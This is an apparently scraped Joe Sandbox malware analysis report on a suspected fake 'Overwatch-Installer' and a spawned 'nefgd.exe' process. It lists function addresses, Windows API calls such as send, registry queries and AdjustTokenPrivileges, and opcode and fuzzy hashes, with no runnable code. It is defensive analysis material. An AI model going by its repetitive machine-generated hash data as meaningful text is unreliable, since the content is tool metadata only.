Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: ConnectionsEnum
String ID:
API String ID: 3832085198-0
Opcode ID: c4c177a79ff18fd76917cbb6d910402019fada7e750600db1a226d69a987e457
Instruction ID: ff379430ebda68632ff4cdbdc1a2ebcceb1788d7c79248742b2b175c52c01e13
Opcode Fuzzy Hash: c4c177a79ff18fd76917cbb6d910402019fada7e750600db1a226d69a987e457
Instruction Fuzzy Hash: 8C01A271500200ABD210DF1ACC46B66FBE8FB88B20F14812AED089BB41D731F915CBE5

Function 05BF554A Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,?,?,?), ref: 05BF5588

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 7edf4cc672db754d80a857f8ff29b4f58bcf0f7f0dce064dc5a23fdbbeb8d849
Instruction ID: 041672cb4391a4b158eee5375babcd219975be2aa8225e083775981123ba8022
Opcode Fuzzy Hash: 7edf4cc672db754d80a857f8ff29b4f58bcf0f7f0dce064dc5a23fdbbeb8d849
Instruction Fuzzy Hash: 91019E72500604AFDB218F55D984B66FBE5EF08320F08C4AADE868B691D375E458DF62

Function 05BF0542 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,?,?,?,?), ref: 05BF0580

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: cab570bd3eadf7bc21bf10f10980c45a31ce0f270fa35ecf25ee623f4b42f337
Instruction ID: 5048c56962f15961a9e66eedc277700f4308821fb38ee6e13fe9e8c483fc277b
Opcode Fuzzy Hash: cab570bd3eadf7bc21bf10f10980c45a31ce0f270fa35ecf25ee623f4b42f337
Instruction Fuzzy Hash: CB018071400244DFDB20DF95D984B66FBE4EF04320F0884AADE864B622C375E458DF62

Function 05BF02AA Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,?,?), ref: 05BF02FA

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 8b4a65f73a64165a6bbeb0520a9d2186d3b9a4fa4c649bd1e671f89fb2a86abb
Instruction ID: be672e443d28771ed3b3025af6b005c459f16821bbf96580edb242632b24f95f
Opcode Fuzzy Hash: 8b4a65f73a64165a6bbeb0520a9d2186d3b9a4fa4c649bd1e671f89fb2a86abb
Instruction Fuzzy Hash: EB01A271500200ABD210DF1ACC46B66FBE8FB88B20F14811AEC489BB41D771F915CBE5

Function 0112A09A Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,?), ref: 0112A0D5

Memory Dump Source

Source File: 00000000.00000002.4462844193.000000000112A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_112a000_Overwatch-Installer.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: c1ceffce8431b76c9554330f8f9f08abf5a5239787f0428cdfc76ed062173ef0
Instruction ID: b707f944de9a4095f5db0636d7084164f9f359c9529cc648492e4402be464147
Opcode Fuzzy Hash: c1ceffce8431b76c9554330f8f9f08abf5a5239787f0428cdfc76ed062173ef0
Instruction Fuzzy Hash: F901B171500244DFDB21CF55E944B62FBE4EF04324F08C4AADE498BA52D375E458CF62

Function 05BF6A7A Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 05BF6AB5

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 65f37dcc77e82d23f2379e7b4c5aaa8cfade7eea6de53531f813ae1ba667497b
Instruction ID: 6f7296982fc36cfd9d6ab471200cf5f348e4db03f49932a5d15ccc2d8341c1b1
Opcode Fuzzy Hash: 65f37dcc77e82d23f2379e7b4c5aaa8cfade7eea6de53531f813ae1ba667497b
Instruction Fuzzy Hash: B601BC32500640DFDB208F56D884B66FBE4EF08220F08C0AADE458B662D371E45CCBB2

Function 0112A8E6 Relevance: 1.5, APIs: 1, Instructions: 39comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 0112A918

Memory Dump Source

Source File: 00000000.00000002.4462844193.000000000112A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_112a000_Overwatch-Installer.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 2ac11bc515079ad21942e28d05d42645a16fd508a07941c3b2453b6bc12bdeb9
Instruction ID: ab49b0bb10ee03e01cc52289d55399a7de249f77fa91c1df6f486b640f7bc53f
Opcode Fuzzy Hash: 2ac11bc515079ad21942e28d05d42645a16fd508a07941c3b2453b6bc12bdeb9
Instruction Fuzzy Hash: CF01FD74A002449FDB10CF1AE984762FBE4EF00320F08C4AACD488F702E379A418CBA2

Function 05BF5AEA Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,?), ref: 05BF5B25

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e10f4e45076bd2863a29ac6aab2db6793b7eef1988cbd30d40e2ab53218808f6
Instruction ID: 5479ffa622101b2852aa98cbec1c5af88826b8a4600c6246be4a84891387e8b8
Opcode Fuzzy Hash: e10f4e45076bd2863a29ac6aab2db6793b7eef1988cbd30d40e2ab53218808f6
Instruction Fuzzy Hash: B10178314006449FDB20CF45D985B62FBA1EF09620F08C0AADE894B6A2C375A459CBA2

Function 05BF4426 Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 05BF4461

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 96b2a13bf8510ae583e15ab3978977532d38c160d9bc32b16bf8de495205e23f
Instruction ID: 29fd06cf70cbc5cfce0d2fbdc4668f4d9918d456274c1d9ed5d67f71e4c48e22
Opcode Fuzzy Hash: 96b2a13bf8510ae583e15ab3978977532d38c160d9bc32b16bf8de495205e23f
Instruction Fuzzy Hash: 73017871400244DFDF20CF45D984B62FBA4EF08224F08809ADE894B662E775A458DBA2

Function 0112A2DA Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,DB04A2A7,00000000,?,?,?,?,?,?,?,?,6CAA3C58), ref: 0112A30C

Memory Dump Source

Source File: 00000000.00000002.4462844193.000000000112A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_112a000_Overwatch-Installer.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2ac842c22d5f2e7a922cb5ebb23be04ba5b0a86cbf996c0d696454193c4e7d12
Instruction ID: 0ebc3f996c5beacff68523b6d185d3c38d67abc535a48fd2cab4f16d3f7b4574
Opcode Fuzzy Hash: 2ac842c22d5f2e7a922cb5ebb23be04ba5b0a86cbf996c0d696454193c4e7d12
Instruction Fuzzy Hash: C5F0AF75408244DFDB24CF09E985762FBE4EF04620F08C0AADE494BB52D3B5A458CAA2

Function 05BF5756 Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 05BF5788

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 24b1dfcb17c025f2fb0ba86dd103055978aa5e6af546717bb047e86dbacbd9c4
Instruction ID: 6191151355e99d8cf1e287fab5081690941e4d426cc24c393d5b630b54649b6d
Opcode Fuzzy Hash: 24b1dfcb17c025f2fb0ba86dd103055978aa5e6af546717bb047e86dbacbd9c4
Instruction Fuzzy Hash: 6EF08775800244EFDB20CF45D985B62FBA4EF04621F08C0EADE494B792D279A449CBA2

Function 0165009B Relevance: .5, Instructions: 544COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4463917974.0000000001650000.00000040.00000020.00020000.00000000.sdmp, Offset: 01650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1650000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ba2a2b28179b4f33f97b1509f2f847f1c253536e4bd278922eb1a803ee34dd5
Instruction ID: b21644cb5d1c42b824390d189c9158bf796c401b5d29868a9a4a8d240176a658
Opcode Fuzzy Hash: 7ba2a2b28179b4f33f97b1509f2f847f1c253536e4bd278922eb1a803ee34dd5
Instruction Fuzzy Hash: D3519D6144E3C09FD7538B748C65AA2BFB4AF03220F0E84DBD885CF5A3D26D9849C762

Function 016502B1 Relevance: .3, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4463917974.0000000001650000.00000040.00000020.00020000.00000000.sdmp, Offset: 01650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1650000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d0a45c86ce3b8a924b9e827338fa6cd0bc5f63544c7abc50f9d9b57d27426df
Instruction ID: 682ca96ff811caee79ca1b3f10b06a21ec5d12f8ae822f2574da563718085806
Opcode Fuzzy Hash: 6d0a45c86ce3b8a924b9e827338fa6cd0bc5f63544c7abc50f9d9b57d27426df
Instruction Fuzzy Hash: A31184724093C09FD7128B54DD94BA2BFF8EB46724F0984AAE9858B653D3299805CB71

Function 016512DC Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4463917974.0000000001650000.00000040.00000020.00020000.00000000.sdmp, Offset: 01650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1650000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55b38eea0975e64025885bf15f7995cf6b62a41bb5e20dac471871d224d0ba76
Instruction ID: c9a071725466810ccd072c9aef76bd4e8f929049b831165d03dd9ed559b110f8
Opcode Fuzzy Hash: 55b38eea0975e64025885bf15f7995cf6b62a41bb5e20dac471871d224d0ba76
Instruction Fuzzy Hash: 5711B130204284DFD715CB54C954B26FBA5AB8A708F28C99CE9494BB53C77BD847CA51

Function 016514A4 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4463917974.0000000001650000.00000040.00000020.00020000.00000000.sdmp, Offset: 01650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1650000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87804636b9376776fd25e0786de881b429c38ef619285a6e16ccffdfb5123dbf
Instruction ID: 7ba1d2e8c00262295ea9366ded92d69852a7fdd6f2c01bd578c60fdee7452d1f
Opcode Fuzzy Hash: 87804636b9376776fd25e0786de881b429c38ef619285a6e16ccffdfb5123dbf
Instruction Fuzzy Hash: DA11D374204280DFD716CB54D980B26FBA5EB8A70CF28C99CED4A0B752C73BD847CA51

Function 05BC351D Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4507782796.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bc0000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c482c0068cf29408a697cb81b42c040263be446c2fcdff02b4c2719792eba7f0
Instruction ID: 11583d5798ced451b2a381349d4d931e59ac4179310c9dc4ea1b6b4e2ab5fef7
Opcode Fuzzy Hash: c482c0068cf29408a697cb81b42c040263be446c2fcdff02b4c2719792eba7f0
Instruction Fuzzy Hash: 8711D7B5908301AFD340CF19D981A5BFBE4FB88660F04892EF998D7311D331E9088FA2

Function 05BC2AB5 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4507782796.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bc0000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d48b21242f4206b68687c3a25fcac7b3fdb8c2df0a7dcff733087caeea3c8f1
Instruction ID: 34e8a1e76129858f7703cff1462857b5941aafd9ed255ef373d597bed84b6980
Opcode Fuzzy Hash: 2d48b21242f4206b68687c3a25fcac7b3fdb8c2df0a7dcff733087caeea3c8f1
Instruction Fuzzy Hash: 0C11DAB5908301AFD340CF19D981A5BFBE4FB88664F04892EF998D7311D231E9088FA2

Function 016512BB Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4463917974.0000000001650000.00000040.00000020.00020000.00000000.sdmp, Offset: 01650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1650000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2361c47a4b8263612a38d66c8202faff788cfa295d0d4ff7d21f74340fc83c0
Instruction ID: 38abd0c016e12c7858d5dde1ae5b3423379d1bd51e832f22e41f33d8e7fd5211
Opcode Fuzzy Hash: c2361c47a4b8263612a38d66c8202faff788cfa295d0d4ff7d21f74340fc83c0
Instruction Fuzzy Hash: 97113D3410D3C49FC717CB24C960B55BFB1AF87604F1985DED8898BAA3C33A9816DB52

Function 016504CE Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4463917974.0000000001650000.00000040.00000020.00020000.00000000.sdmp, Offset: 01650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1650000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c50ba5e97b504e8cae8208182025b20a47f7c7775f8dcd8bdfd564b42f339e2
Instruction ID: a6b29c5444590e8a626a7c820f3e1033960cc29da37071eeb558b66dfcbb1a2d
Opcode Fuzzy Hash: 2c50ba5e97b504e8cae8208182025b20a47f7c7775f8dcd8bdfd564b42f339e2
Instruction Fuzzy Hash: 0F0124725046C0DFD751CF59DA80766FBD4EB44728F08C46AED4A4BB02C379E849CB62

Function 0165148F Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4463917974.0000000001650000.00000040.00000020.00020000.00000000.sdmp, Offset: 01650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1650000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 985cd9bef55263f4672f196cfe30b0b261e9b77683ff49e939884ce242a34156
Instruction ID: 14d3f9e138ad73764833aab86719b08068018b447d51b1292d3f2fd4f998027e
Opcode Fuzzy Hash: 985cd9bef55263f4672f196cfe30b0b261e9b77683ff49e939884ce242a34156
Instruction Fuzzy Hash: E1112A341092C0CFD716CB14D990B55BFB1AB46618F2886EED8895B6A3C33A9806CB52

Function 016505DF Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4463917974.0000000001650000.00000040.00000020.00020000.00000000.sdmp, Offset: 01650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1650000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ad5753c76bb720bbf3795c026374507dd043aed881b23c52bc868baaa0e5fef
Instruction ID: 5c0418208e57e0686e8cee8917b789d510d4ddb10bf197a1884dd5ea2f45678c
Opcode Fuzzy Hash: 5ad5753c76bb720bbf3795c026374507dd043aed881b23c52bc868baaa0e5fef
Instruction Fuzzy Hash: 3701D6B61493846FC7118F55EC40853BFF8DF4623070984AFE8888B612D179B949CB76

Function 01651398 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4463917974.0000000001650000.00000040.00000020.00020000.00000000.sdmp, Offset: 01650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1650000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 353069910d9b7990af69e6a81ae0fdd4a1cb8011ced05a6191c04bf1adf0271e
Instruction ID: d44889581c23124a1d0569a4a75ce03753d340240b9cf15c78a7cc67b89d6c60
Opcode Fuzzy Hash: 353069910d9b7990af69e6a81ae0fdd4a1cb8011ced05a6191c04bf1adf0271e
Instruction Fuzzy Hash: 4AF0C935148644DFC716CF44D980B16FBA2FB89718F24CAADE9491BB62C737E813DA81

Function 0165155C Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4463917974.0000000001650000.00000040.00000020.00020000.00000000.sdmp, Offset: 01650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1650000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08f822d5cd3cedf3dae9857ae8bd5051a6358bf0006ed9169544e2a6cc3e2719
Instruction ID: 529a86c3d5b30f51373e552b1d95882727cfa55d4119d949080ed81d28ae1147
Opcode Fuzzy Hash: 08f822d5cd3cedf3dae9857ae8bd5051a6358bf0006ed9169544e2a6cc3e2719
Instruction Fuzzy Hash: FFF03C35104684DFC706CF44D980B15FBA2FB89718F28C6ADE9490BB52C33BE813CA81

Function 01650606 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4463917974.0000000001650000.00000040.00000020.00020000.00000000.sdmp, Offset: 01650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1650000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98475ae77de7b44772d6e5ebedeea78b9bb6cdf980f29c4e45f01b14382971a2
Instruction ID: bd9f61dcf6be9b7efdff8baee28fc7a2313f60f1094f24bf3f2f30338cc802bd
Opcode Fuzzy Hash: 98475ae77de7b44772d6e5ebedeea78b9bb6cdf980f29c4e45f01b14382971a2
Instruction Fuzzy Hash: C9E092B66006044F9650CF0AED41462F7D8EB84630B08C47FDC0D8B701D236B508CAA5

Function 05BC2B17 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4507782796.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bc0000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4201f5a6611cc44ea444034de4e0b0c67891ba8d70013fbd52eac48dcc6ac6a6
Instruction ID: 91551abe2e3df4256859643a85ad6c2eb65184996103d7a55becb041e3b6d069
Opcode Fuzzy Hash: 4201f5a6611cc44ea444034de4e0b0c67891ba8d70013fbd52eac48dcc6ac6a6
Instruction Fuzzy Hash: 1EE048B25402046BD2509F06DD46F63F798DB54A30F08C567EE095F742E176B6188AF5

Function 05BC357F Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4507782796.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bc0000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd6e0ed1f9c6e948f3151e5f248b19e17ecd69a660a58654ad80a7628cea4ae9
Instruction ID: 538a4dd550dac28a79d7b5e7dd7744828814066dec5bea11dc663776907377d8
Opcode Fuzzy Hash: fd6e0ed1f9c6e948f3151e5f248b19e17ecd69a660a58654ad80a7628cea4ae9
Instruction Fuzzy Hash: 49E0D8F25402006BD2508E06DD46F63FB98DB44A30F08C467ED085B741D172B5188AF5

Function 011223F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4462820784.0000000001122000.00000040.00000800.00020000.00000000.sdmp, Offset: 01122000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1122000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a0581e23ebaf4d906993f6ff3fcecc4e1e081f0f33c0bd88bd85d1024229788
Instruction ID: 7566e28aa80ceeda4d834caa6a5a2c6036ec9cc3c76574ae8d44f656651fb3d1
Opcode Fuzzy Hash: 7a0581e23ebaf4d906993f6ff3fcecc4e1e081f0f33c0bd88bd85d1024229788
Instruction Fuzzy Hash: A1D02E393006D04FE31A8A0CC2A8B893BE4AB40704F0A00FAEC008B763C768E4C0C600

Function 011223BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4462820784.0000000001122000.00000040.00000800.00020000.00000000.sdmp, Offset: 01122000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1122000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8fd56ce3d2630f59f8a5630fcceebb86541f3e5b823d123f921c54b432d5ba1
Instruction ID: 8a4a2b0b1db3c0222d2231a0aeb0a505ff8a9d3c464c5489c1c7bb64e5dcff7b
Opcode Fuzzy Hash: a8fd56ce3d2630f59f8a5630fcceebb86541f3e5b823d123f921c54b432d5ba1
Instruction Fuzzy Hash: 90D05E342046814BD719DA0CC2D4F9D3BD4AF44714F0644E8AC108B762C7B4E8D4CA00

Non-executed Functions

Function 06700070 Relevance: 9.4, Strings: 3, Instructions: 5684COMMON

Download Yara Rule

Strings

d, xrefs: 06704832
d, xrefs: 06700763
d, xrefs: 0670077D

Memory Dump Source

Source File: 00000000.00000002.4513229338.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6700000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID: d$d$d
API String ID: 0-1898527202
Opcode ID: e2ec5a4f8b54c3c768a99be7f4c066921d6b4a25246024b73030bb47600f63dc
Instruction ID: 883bc134c8bcf610cccb74f4a718796e69302e80fb16f56e9f18153225c0f624
Opcode Fuzzy Hash: e2ec5a4f8b54c3c768a99be7f4c066921d6b4a25246024b73030bb47600f63dc
Instruction Fuzzy Hash: 07C3B275900A299FEB65CF68CD44ACAF7F2BF89300F0581E5E50CAB261D771AE858F41

Function 0670001F Relevance: 4.7, Strings: 2, Instructions: 2207COMMON

Download Yara Rule

Strings

d, xrefs: 06700763
d, xrefs: 0670077D

Memory Dump Source

Source File: 00000000.00000002.4513229338.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6700000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID: d$d
API String ID: 0-195624457
Opcode ID: cb895cda860c4b28cd4a0ab1b2b99316ac76a9f60f2928522e5e22a0a594df01
Instruction ID: 516e352f963463ab24a9cbae3189357e9d115eb85e821c70d4e15e91f442cb25
Opcode Fuzzy Hash: cb895cda860c4b28cd4a0ab1b2b99316ac76a9f60f2928522e5e22a0a594df01
Instruction Fuzzy Hash: 3723D475900A299FEBA1CF68C944ADAF7F2BF89304F0580E5D50CAB221D771AE85CF51

Analysis Process: nefgd.exePID: 5952, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	19%
Dynamic/Decrypted Code Coverage:	82.7%
Signature Coverage:	0%
Total number of Nodes:	156
Total number of Limit Nodes:	9

Executed Functions

Function 05823CBF Relevance: 13.0, APIs: 3, Instructions: 8466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4511534588.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5820000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05a82cbd1e005c3d42fa01ed7322cddc2d03beac88bedaa442bceebe1b81bd5a
Instruction ID: b9bdb250524fd41d0149e7110dcb8fbd58cf625e4ade066de3a9464bea934129
Opcode Fuzzy Hash: 05a82cbd1e005c3d42fa01ed7322cddc2d03beac88bedaa442bceebe1b81bd5a
Instruction Fuzzy Hash: 44F33D34A042248FCB64DF65D964BADB7F2EF84205F1080A9D80AE7794EF39AD85CF51

Function 05820F78 Relevance: 7.9, APIs: 1, Strings: 3, Instructions: 923COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0582117C

Strings

]X4k^, xrefs: 058215F1, 058215F6
MX4k^, xrefs: 058215A0, 058215A5
mX4k^, xrefs: 0582168D, 05821692

Memory Dump Source

Source File: 00000003.00000002.4511534588.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5820000_nefgd.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID: MX4k^$]X4k^$mX4k^
API String ID: 6842923-2162205131
Opcode ID: 402dd179fb6a88ff60badeb928aa9f658daa046fa6669afcd13024bc0c70e43e
Instruction ID: f6bc180bdae0fec1c892086e15a544842ed33c19c4e5396e9b8b4dc147f99a2b
Opcode Fuzzy Hash: 402dd179fb6a88ff60badeb928aa9f658daa046fa6669afcd13024bc0c70e43e
Instruction Fuzzy Hash: 7A622630B042508FDB15AB7888587AD7BE3AFC5208F248469D906DB791EF79DC8AC791

Function 05820F69 Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 713COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0582117C

Strings

]X4k^, xrefs: 058215F1, 058215F6
MX4k^, xrefs: 058215A0, 058215A5
mX4k^, xrefs: 0582168D, 05821692

Memory Dump Source

Source File: 00000003.00000002.4511534588.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5820000_nefgd.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID: MX4k^$]X4k^$mX4k^
API String ID: 6842923-2162205131
Opcode ID: cd7897990d4d36d39c11e165c2c50b58a7f41970030f342aaf0328319c531a74
Instruction ID: 65a2a0cbabce898240a814f7a121eb448c46a49e0915a36b6f01f2cde2fef3b8
Opcode Fuzzy Hash: cd7897990d4d36d39c11e165c2c50b58a7f41970030f342aaf0328319c531a74
Instruction Fuzzy Hash: 2F422730B042508BDB29A734D8583AD7AE3ABC5348F24847DD806DB795EF79DC8AC791

Function 0612253F Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 061225BF

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 88585d46f44dce37bb79904bcba5e33220b83ec5842714c433b3464ba2d2c730
Instruction ID: 0c5c3278946a7c8e4a79a061b6c99f464decfef9abd247b691762eef278cc260
Opcode Fuzzy Hash: 88585d46f44dce37bb79904bcba5e33220b83ec5842714c433b3464ba2d2c730
Instruction Fuzzy Hash: 7421EC76509380AFDB228F24CC44B92BFB4EF06310F0885DAE9858B163D331E918DB62

Function 06122E7F Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON

Download Yara Rule

APIs

